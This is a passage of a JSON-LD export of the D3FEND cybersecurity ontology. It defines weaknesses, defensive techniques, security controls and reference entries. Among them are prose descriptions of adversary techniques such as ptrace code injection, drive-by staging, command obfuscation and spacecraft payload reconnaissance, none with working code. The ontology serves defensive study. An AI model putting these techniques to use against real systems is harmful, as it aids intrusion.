      "d3f:kb-abstract": "There is a significant body of work devoted to testing, verifying, and certifying the correctness of optimizing compilers. The focus of such work is to determine if source code and optimized code have the same functional semantics. In this paper, we introduce the correctness-security gap, which arises when a compiler optimization preserves the functionality of but violates a security guarantee made by source code. We show with concrete code examples that several standard optimizations, which have been formally proved correct, inhabit this correctness-security gap. We analyze this gap and conclude that it arises due to techniques that model the state of the program but not the state of the underlying machine. We propose a broad research program whose goal is to identify, understand, and mitigate the impact of security errors introduced by compiler optimizations. Our proposal includes research in testing, program analysis, theorem proving, and the development of new, accurate machine models for reasoning about the impact of compiler optimizations on security.",
      "d3f:kb-author": "Vijay D'Silva, Mathias Payer, Dawn Song",
      "d3f:kb-organization": "Google Inc, Purdue University, UC Berkeley",
      "d3f:kb-reference-of": {
        "@id": "d3f:DeadCodeElimination"
      },
      "d3f:kb-reference-title": "The Correctness-Security Gap in Compiler Optimization",
      "rdfs:label": "Reference - Dead code elimination"
    },
    {
      "@id": "d3f:CWE-74",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-74",
      "d3f:definition": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:CWE-591",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-591",
      "d3f:definition": "The product stores sensitive data in memory that is not locked, or that has been incorrectly locked, which might cause the memory to be written to swap files on disk by the virtual memory manager. This can make the data more accessible to external actors.",
      "rdfs:label": "Sensitive Data Storage in Improperly Locked Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-413"
      }
    },
    {
      "@id": "d3f:T1608.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.004",
      "d3f:definition": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).",
      "rdfs:label": "Drive-by Target",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:Reference-IntrusionDetectionUsingAHeartbeat_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180191752A1"
      },
      "d3f:kb-abstract": "A variety of techniques are disclosed for detection of advanced persistent threats and similar malware. In one aspect, the detection of certain network traffic at a gateway is used to trigger a query of an originating endpoint, which can use internal logs to identify a local process that is sourcing the network traffic. In another aspect, an endpoint is configured to periodically generate and transmit a secure heartbeat, so that an interruption of the heartbeat can be used to signal the possible presence of malware. In another aspect, other information such as local and global reputation information is used to provide context for more accurate malware detection.",
      "d3f:kb-author": "Kenneth D. Ray",
      "d3f:kb-mitre-analysis": "This patent describes a health monitor deployed on an endpoint that uses a heartbeat to periodically communicate status to a gateway's remote health monitor. The endpoint health monitor issues a heartbeat for satisfactory status of the endpoint using factors such as:\n\n* checking the status of individual software items executing on the endpoint\n* checking that antivirus and other security software is up to date (e. g., with current virus definition files) and running correctly\n* checking the integrity of cryptographic key stores\n* checking other hardware or software components of the endpoint as necessary or helpful for health monitoring\n\nA disappearance of the heartbeat from the endpoint may indicate that the endpoint has been compromised.",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:EndpointHealthBeacon"
      },
      "d3f:kb-reference-title": "Intrusion detection using a heartbeat",
      "rdfs:label": "Reference - Intrusion detection using a heartbeat - Sophos Ltd"
    },
    {
      "@id": "d3f:member-of",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "member-of",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      }
    },
    {
      "@id": "d3f:WebResourceAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Ephemeral digital artifact comprising a request of a network resource and any response from that network resource using a standard web protocol.",
      "rdfs:label": "Web Resource Access",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkResourceAccess"
      }
    },
    {
      "@id": "d3f:NetworkInterfaceCard",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:NetworkCardFirmware"
      },
      "d3f:definition": "A network interface card (NIC, also known as a network interface controller, network adapter, LAN adapter or physical network interface, and by similar terms) is a computer hardware component that connects a computer to a computer network.",
      "d3f:synonym": "Network Interface Controller",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Network_interface_controller"
      },
      "rdfs:label": "Network Interface Card",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/network_interface"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:Naf6237219485459aa3f596b10384ce29"
        }
      ]
    },
    {
      "@id": "_:Naf6237219485459aa3f596b10384ce29",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkCardFirmware"
      }
    },
    {
      "@id": "d3f:ContentSubstitution",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentSubstitution"
      ],
      "d3f:d3fend-id": "D3-CNS",
      "d3f:definition": "Modifies specific digital content information by replacing it with something else.",
      "d3f:kb-article": "## How it works\n\nIf malicious or unnecessary elements are discovered within the content, or if a specific embedded portion does not comply with policy, that content may be replaced with alternatives to ensure safety.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "rdfs:label": "Content Substitution",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentModification"
      }
    },
    {
      "@id": "d3f:CCI-001237_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated patch management tools to facilitate flaw remediation to organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001237"
    },
    {
      "@id": "d3f:HardLink",
      "@type": "owl:Class",
      "d3f:definition": "In computing, a hard link is a directory entry that associates a name with a file on a file system. All directory-based file systems must have at least one hard link giving the original name for each file. The term \"hard link\" is usually only used in file systems that allow more than one hard link for the same file. Multiple hard links -- that is, multiple directory entries to the same file -- are supported by POSIX-compliant and partially POSIX-compliant operating systems, such as Linux, Android, macOS, and also Windows NT4 and later Windows NT operating systems.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Hard_link"
      },
      "rdfs:label": "Hard Link",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSystemLink"
      }
    },
    {
      "@id": "d3f:CWE-921",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-921",
      "d3f:definition": "The product stores sensitive information in a file system or device that does not have built-in access control.",
      "rdfs:label": "Storage of Sensitive Data in a Mechanism without Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-922"
      }
    },
    {
      "@id": "d3f:CCI-000776_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses organization-defined replay-resistant authentication mechanisms for network access to non-privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000776"
    },
    {
      "@id": "d3f:REC-0001.07",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.07",
      "d3f:definition": "Adversaries pursue a clear picture of payload type, operating modes, command set, and data paths to and from the bus and ground. High-value details include vendor and model, operating constraints (thermal, pointing, contamination), mode transition logic, timing of calibrations, safety inhibits and interlocks, firmware/software update paths, data formatting and compression, and any crypto posture differences between payload links and the main command link. Payload ICDs often reveal addresses, message identifiers, and gateway locations where payload traffic bridges to the C&DH or data-handling networks, creating potential pivot points. Knowledge of duty cycles and scheduler entries enables timing attacks that coincide with high-power or high-rate operations to stress power/thermal margins or saturate storage and downlink. Even partial information, calibration script names, test vectors, or engineering telemetry mnemonics, can shrink the search space for reverse engineering.",
      "rdfs:label": "Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/07/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Payload"
    },
    {
      "@id": "d3f:LinearRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LR",
      "d3f:definition": "Statistical regression method used for predictive analysis by modeling the linear relationship between independent and dependent variables.",
      "d3f:kb-article": "## How it works\nTakes independent variables (i.e. covariate, features, predictors, input variables) and dependent variables (i.e. response, output, “thing to be estimated”) and produces the coefficient(s) and intercept for a linear equation (e.g. (β1, β0) for y = β1x + β0) which predicts the relationship between the independent and dependent variables by minimizing a cost function, Mean Squared Error, either directly in the case of univariate linear regression or by gradient descent* in the case of multivariate linear regression.\n\n## Considerations\n - There are four principal assumptions required for good results using linear regression (the first letters of the four principal assumptions form the \"LINE\" mnemonic):\n   - Linearity and Additivity\n   - Independent Residuals\n   - Normal Residual Distributions\n   - Equal Variances (i.e. homoscedasticity)\n - Linear regression is a low variance/high bias model.\n - Optimizers like Adam, Batch, and Mini-Batch and others are available for certain applications and data sets.\n - A large learning ratio or training coefficient may lead to divergent behavior of the model, and values that are too small may lead to long run times and inefficiency.\n\n\n## Verification Approach\n - Models are often evaluated by examining one or more of the metrics of R2, Root Mean Squared Error (RMSE), Mean Absolute Error (MAE), and Mean Absolute Percentage Error (MAPE).\n - While there is no generally accepted single best performance metric as a criterion, users of linear regression should consider the suitability of one or more of these metrics for assessing the performance of their model.\n - Use well known data sets to verify model execution.\n\n## Validation Approach\n - Violating the principal assumptions of linear regression leads to poor or misleading results.\n - Ensure data is truly representative and check whether there are any known biases.\n\n\n## References\n1. Gawali, Suvarna. “Linear Regression Algorithm to Make Predictions Easily.” Analytics Vidhya, 22 July 2022, https://www.analyticsvidhya.com/blog/2021/06/linear-regression-in-machine-learning/.\n1. Nau, Robert. “Statistical Forecasting: Notes On Regression and Time Series Analysis.” Introduction to Linear Regression Analysis, Duke University Fuqua School of Business, 18 Aug. 2020, https://people.duke.edu/~rnau/regintro.htm.\n1. Ng, Ritchie. “Evaluating a Linear Regression Model.” Ritchieng.github.io, 8 Jan. 2023, https://www.ritchieng.com/machine-learning-evaluate-linear-regression-model/.\n1. Bochkarev, Alexei. \"A New Typology Design of Performance Metrics to Measure Errors in Machine Learning Regression Algorithms\", 2019, https://www.researchgate.net/publication/330661543_A_New_Typology_Design_of_Performance_Metrics_to_Measure_Errors_in_Machine_Learning_Regression_Algorithms.",
      "rdfs:label": "Linear Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:d3fend-general-object-property",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "d3fend-general-object-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:CCI-002468_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs data origin verification authentication on the name/address resolution responses the system receives from authoritative sources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002468"
    },
    {
      "@id": "d3f:WindowsNtAllocateVirtualMemoryEx",
      "@type": "owl:Class",
      "rdfs:label": "Windows NtAllocateVirtualMemoryEx",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:BucketOfModels",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BOM",
      "d3f:definition": "A \"bucket of models\" is an ensemble technique in which a model selection algorithm is used to choose the best model for each problem. When tested with only one problem, a bucket of models can produce no better results than the best model in the set, but when evaluated across many problems, it will typically produce much better results, on average, than any model in the set.",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Bucket of Models",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-581",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-581",
      "d3f:definition": "The product does not maintain equal hashcodes for equal objects.",
      "rdfs:label": "Object Model Violation: Just One of Equals and Hashcode Defined",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-697"
        }
      ]
    },
    {
      "@id": "d3f:OperatingSystemConfigurationComponent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A component of the overall information necessary for the configuration of an operating system.",
      "rdfs:label": "Operating System Configuration Component",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/03085025-n"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystemConfiguration"
      },
      "skos:altLabel": [
        "Operating System Configuration Information",
        "System Configuration"
      ]
    },
    {
      "@id": "d3f:SupervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SL",
      "d3f:definition": "Supervised learning establishes a relationship between the known input and output variables to conduct a predictive analysis.",
      "d3f:kb-article": "## References\nSupervised learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Supervised_learning).",
      "rdfs:label": "Supervised Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:SourceCodeAnalyzerTool",
      "@type": "owl:Class",
      "d3f:definition": "A source code analyzer tool is a static analysis tool that operates specifically on source code, but not object code.",
      "rdfs:label": "Source Code Analyzer Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Static_program_analysis"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:StaticAnalysisTool"
      }
    },
    {
      "@id": "d3f:OTDeleteControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a remote device to remove an existing control program.",
      "rdfs:label": "OT Delete Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommandEvent"
        },
        {
          "@id": "_:N7f182255cbd74d3bad3bdba0a13126bd"
        },
        {
          "@id": "_:N36c2dd5a8f7741f782e3a969da2e96e7"
        }
      ]
    },
    {
      "@id": "_:N7f182255cbd74d3bad3bdba0a13126bd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:N36c2dd5a8f7741f782e3a969da2e96e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeleteControlProgramCommand"
      }
    },
    {
      "@id": "d3f:ImageSegment",
      "@type": "owl:Class",
      "d3f:definition": "Image segments are distinct partitions of an object file.  Both data and code segments are examples of image segments.",
      "rdfs:label": "Image Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ObjectFile"
        },
        {
          "@id": "dbr:Object_file"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:BinarySegment"
        },
        {
          "@id": "d3f:FileSection"
        }
      ]
    },
    {
      "@id": "d3f:IntegratedHoneynet",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IntegratedHoneynet"
      ],
      "d3f:d3fend-id": "D3-IHN",
      "d3f:definition": "The practice of setting decoys in a production environment to entice interaction from attackers.",
      "d3f:kb-article": "## How it works\nIntegrated honeynets use full production environments connected to the enterprise network, that utilize computing resources or software that attract attackers, and allow full interaction and access that provides a complete view of an attack.\n\n## Considerations\nAn attacker with control of a system on an Integrated Honeynet could:\n* try to attack other connected hosts on the network, its IP range of internal hosts not properly configured to react to connections from machines on the integrated honeynet, or position behind the firewall.\n* exploit its position by eavesdropping on network traffic\nIf an attacker manages to stop the processes used to log an attack without setting off any alarms. [1]\n\n1. Honeypots for Windows, Roger Grimes, 2005",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SynchronizingAHoneyNetworkConfigurationToReflectATargetNetworkEnvironment_PaloAltoNetworksInc"
      },
      "d3f:spoofs": {
        "@id": "d3f:IntranetNetwork"
      },
      "rdfs:label": "Integrated Honeynet",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "_:N8b5db15d57e24de28fbeb59d2e7c3fba"
        }
      ]
    },
    {
      "@id": "_:N8b5db15d57e24de28fbeb59d2e7c3fba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetwork"
      }
    },
    {
      "@id": "d3f:CWE-277",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-277",
      "d3f:definition": "A product defines a set of insecure permissions that are inherited by objects that are created by the program.",
      "rdfs:label": "Insecure Inherited Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:RestoreDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreDatabase"
      ],
      "d3f:d3fend-id": "D3-RD",
      "d3f:definition": "Restoring the data in a database.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Database"
      },
      "rdfs:label": "Restore Database",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreObject"
        },
        {
          "@id": "_:Nb0b40229d1d94ee98c9a6db64517b96b"
        }
      ]
    },
    {
      "@id": "_:Nb0b40229d1d94ee98c9a6db64517b96b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:T1055.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.008",
      "d3f:definition": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Ptrace System Calls",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:Nbbeaa77199f34a7fa3b501b27d8241b5"
        }
      ]
    },
    {
      "@id": "_:Nbbeaa77199f34a7fa3b501b27d8241b5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:BayesianHypothesisTesting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BHT",
      "d3f:definition": "Bayesian hypothesis testing can be framed as a special case of model comparison where a model refers to a likelihood function and a prior distribution.",
      "d3f:kb-article": "## How it works\nGiven two competing hypotheses and some relevant data, Bayesian hypothesis testing begins by specifying separate prior distributions to quantitatively describe each hypothesis. The combination of the likelihood function for the observed data with each of the prior distributions yields hypothesis-specific models. For each of the hypothesis-specific models, averaging (i.e., integrating) the likelihood with respect to the prior distribution across the entire parameter space yields the probability of the data under the model and, therefore, the corresponding hypothesis. This quantity is more commonly referred to as the marginal likelihood and represents the average fit of the model to the data. The ratio of the marginal likelihoods for both hypothesis-specific models is known as the Bayes factor.\n\n## References\nBaig, S. A., PhD. (2020). Bayesian Inference: An Introduction to Hypothesis Testing Using Bayes Factors. Nicotine & Tobacco Research, 22(7), 1244-1246. [Link](https://academic.oup.com/ntr/article/22/7/1244/5613971)",
      "rdfs:label": "Bayesian Hypothesis Testing",
      "rdfs:subClassOf": {
        "@id": "d3f:BayesianMethod"
      }
    },
    {
      "@id": "d3f:IPCTrafficAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IPCTrafficAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:IntranetIPCNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-IPCTA",
      "d3f:definition": "Analyzing standard inter process communication (IPC) protocols to detect deviations from normal protocol activity.",
      "d3f:kb-article": "## How it works\nInter-process communication enables applications or threads to share data. This can involve one or more computers. Monitoring IPC in your environment can reveal abnormal or malicious activity.\nIPC can occur within a single computer or between multiple computers remotely through network protocols. Thus there are multiple ways to collect and monitor these exchanges between processes. A network protocol analyzer may monitor and parse SMB network traffic to record system activity. A host-based monitoring agent may monitor IPC activity contained within a single host to look for deviations from standard usage.\n\n### Examples\n * SMB\n * ZeroMQ\n * Java RMI API\n\n## Considerations\n* IPC can generate substantial amounts of data, and it may not be feasible to collect all of it.\n* IPC may occur over loopback interfaces or direct memory access granted by the operating system.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-SMBCopyAndExecution_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBEventsMonitoring_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBSessionSetups_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBWriteRequest-NamedPipes_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBWriteRequest_MITRE"
        },
        {
          "@id": "d3f:Reference-SecuritySystemWithMethodologyForInterprocessCommunicationControl_CheckPointSoftwareTechInc"
        },
        {
          "@id": "d3f:Reference-CAR-2015-04-001%3ARemotelyScheduledTasksViaAT_MITRE"
        }
      ],
      "d3f:synonym": "IPC Analysis",
      "rdfs:label": "IPC Traffic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N4b3f0be85b7748bd88d7111a77999018"
        }
      ]
    },
    {
      "@id": "_:N4b3f0be85b7748bd88d7111a77999018",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetIPCNetworkTraffic"
      }
    },
    {
      "@id": "d3f:employs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x employs y: The entity x makes purposeful use of entity y to perform a function.",
      "rdfs:label": "employs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:UnloadModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call that unloads a driver or extension from the kernel.",
      "d3f:unloads": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "d3f:KernelModule"
        }
      ],
      "rdfs:label": "Unload Module",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ne9e73cd078da49b59e2aea84bc8c74a7"
        },
        {
          "@id": "_:Nef6354bcef9341858ceac97598a1999e"
        }
      ]
    },
    {
      "@id": "_:Ne9e73cd078da49b59e2aea84bc8c74a7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:unloads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "_:Nef6354bcef9341858ceac97598a1999e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:unloads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:EventLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DigitalEventRecord"
      },
      "d3f:definition": "Event logs record events taking place in the execution of a system in order to provide an audit trail that can be used to understand the activity of the system and to diagnose problems. They are essential to understand the activities of complex systems, particularly in the case of applications with little user interaction (such as server applications).",
      "d3f:synonym": "Digital Event Log",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Log_file#Event_logs"
      },
      "rdfs:label": "Event Log",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Log"
        },
        {
          "@id": "_:N00528a3c02594abf9f748951fdb3efd5"
        }
      ]
    },
    {
      "@id": "_:N00528a3c02594abf9f748951fdb3efd5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalEventRecord"
      }
    },
    {
      "@id": "d3f:KernelAPISensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Monitors system calls (operating system API functions).",
      "d3f:monitors": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Kernel API Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:N1959f76a8dcb4335bdaa0bc345d3ac9f"
        }
      ]
    },
    {
      "@id": "_:N1959f76a8dcb4335bdaa0bc345d3ac9f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-1272",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1272",
      "d3f:definition": "The product performs a power or debug state transition, but it does not clear sensitive information that should no longer be accessible due to changes to information access restrictions.",
      "rdfs:label": "Sensitive Information Uncleared Before Debug/Power State Transition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-4_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Nonlocal Maintenance | Logging and Review",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "MA-4(1)"
    },
    {
      "@id": "d3f:T1074",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1074",
      "d3f:definition": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)",
      "d3f:reads": {
        "@id": "d3f:Resource"
      },
      "rdfs:label": "Data Staged",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N25a12e95ba804951ade1f2dded22c618"
        }
      ]
    },
    {
      "@id": "_:N25a12e95ba804951ade1f2dded22c618",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:OfficeApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An office application is one that is part of an application suite (e.g., Microsoft Office, Open Office).",
      "rdfs:label": "Office Application",
      "rdfs:subClassOf": {
        "@id": "d3f:UserApplication"
      }
    },
    {
      "@id": "d3f:T1027.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.010",
      "d3f:definition": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)",
      "rdfs:label": "Command Obfuscation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:CCI-002355_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces access control decisions based on organization-defined security attributes that do not include the identity of the user or process acting on behalf of the user.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
